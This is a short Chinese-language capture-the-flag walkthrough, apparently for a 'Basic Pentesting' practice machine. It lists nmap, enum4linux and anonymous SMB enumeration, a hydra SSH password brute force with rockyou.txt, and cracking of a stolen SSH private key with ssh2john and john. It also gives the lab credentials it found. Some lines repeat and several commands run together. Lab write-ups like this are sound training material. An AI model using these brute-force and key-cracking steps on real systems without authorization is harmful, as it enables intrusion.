
Basic Pentesting-练习
本文相关内容:针对目标机器,练习攻击Web应用程序以及进行权限提升。
Web应用程序测试和提权(横向)练习
nmap -sV -sC -T4 10.10.144.213
#可以使用-oN 将nmap扫描的结果输出为具有普通格式的文本








最后更新于

本文相关内容:针对目标机器,练习攻击Web应用程序以及进行权限提升。
nmap -sV -sC -T4 10.10.144.213
#可以使用-oN 将nmap扫描的结果输出为具有普通格式的文本








最后更新于
enum4linux 10.10.144.213 #由之前的nmap扫描结果可知:目标机运行了Samba服务
#我们尝试使用匿名登录Samba
smbclient //10.10.144.213/anonymous
#发现员工信息,成功获取目标机用户名hydra -l jan -P rockyou.txt ssh://10.10.144.213 ssh jan@10.10.144.213 -oHostKeyAlgorithms=+ssh-rsa
#输入密码:armandochmod 600 idrsa.id_rsa
# ssh -i idrsa.id_rsa kay@10.10.144.213 -oHostKeyAlgorithms=+ssh-rsa 执行失败 提示输入密码口令
#提取密钥hash值
ssh2john idrsa.id_rsa > id_rsa_hash.txt
#破解hash值
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txtssh -i idrsa.id_rsa kay@10.10.144.213 -oHostKeyAlgorithms=+ssh-rsa
#输入密码口令 beeswax